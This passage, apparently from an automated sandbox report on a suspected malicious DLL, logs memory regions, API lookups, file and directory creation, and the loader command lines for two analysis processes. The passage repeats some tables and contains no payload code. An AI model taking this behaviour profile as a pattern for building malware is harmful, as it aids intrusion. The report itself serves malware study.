| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95753 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #29: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #29 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbac |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BB0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0034ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000350000 | 0x00350000 | 0x003bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x005f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000680000 | 0x00680000 | 0x0068ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95815 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #30: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbb8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BBC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0032ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000330000 | 0x00330000 | 0x003f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000400000 | 0x00400000 | 0x00500fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x0110ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x012effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012f0000 | 0x012f0000 | 0x0150ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
